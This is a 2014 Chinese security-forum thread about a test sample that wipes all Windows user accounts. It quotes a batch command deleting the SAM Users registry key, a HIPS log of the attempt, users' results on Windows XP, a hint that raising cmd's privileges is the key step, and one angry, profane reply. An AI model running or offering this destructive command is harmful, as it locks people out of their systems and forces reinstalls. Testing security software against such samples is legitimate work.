删除所有账户（包括内置账户）

深山红叶__

vm001 发表于 2014-6-7 09:13
@echo off
cmd /k reg delete HKLM\SAM\SAM\Domains\Account\Users /f

在这之前还有关键的一步

hddu 发表于 2014-6-7 11:36:39
2014-06-07 11:33:38    创建文件      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Test\KaFan Test.bat
触发规则:所有程序规则->Documents and Settings设置（二）->?:\Documents and Settings\*\桌面\*


2014-06-07 11:33:39    运行应用程序      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c "KaFan Test.bat"
触发规则:所有程序规则->系统程序设置->%windir%\system32\cmd.exe


2014-06-07 11:33:40    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/k reg delete HKLM\SAM\SAM\Domains\Account\Users /f
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2014-06-07 11:33:40    运行应用程序      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:delete HKLM\SAM\SAM\Domains\Account\Users /f
触发规则:所有程序规则->系统程序设置->*\reg.exe


2014-06-07 11:33:47    关闭/重启系统      操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe

触发规则:所有程序规则->*

在这之前还有关键的一步否则REG不起作用

深山红叶__

Qutianshang 发表于 2014-6-7 10:43
重启出现12天过期？？

重启还能进桌面？！
请提供系统信息

Qutianshang

深山红叶__ 发表于 2014-6-7 11:57
重启还能进桌面？！
请提供系统信息

很正常啊。xp32

深山红叶__

Qutianshang 发表于 2014-6-7 12:04
很正常啊。xp32

按理来说重启后所有账户就都没了，同XP32bit debug成功，可能没考虑好兼容，楼主再运行试试？

深山红叶__

柯林 发表于 2014-6-7 11:43
直接挂掉（图又被限制上传了）

原来是禁运党

Qutianshang

深山红叶__ 发表于 2014-6-7 12:08
按理来说重启后所有账户就都没了，同XP32bit debug成功，可能没考虑好兼容，楼主再运行试试？

我刚试了一下，确实没有账户了。之前测试我使用的是xpsp2，在哪里拦截了

深山红叶__

Qutianshang 发表于 2014-6-7 12:12
我刚试了一下，确实没有账户了。之前测试我使用的是xpsp2，在哪里拦截了

不清楚，不知道是不是sp2缺功能之类的...
现在欢迎登陆界面是不是什么都没有？

vm001

深山红叶__ 发表于 2014-6-7 11:52
在这之前还有关键的一步

在这之前还有关键的一步否则REG不起作用

给cmd提权

深山红叶__

JokerJ 发表于 2014-6-7 12:17
你妈逼害得老子重装系统 不得好死

最好虚拟机运行，实机运行请套个影子什么的

请自己看帖
版区说明：

安全警告：本区的附件都有可能具有威胁您的计算机安全的可能，并且没有任何安全软件能够100%保证防护住这些样本，请勿实机测试这些样本哦~

无脑喷是没有用的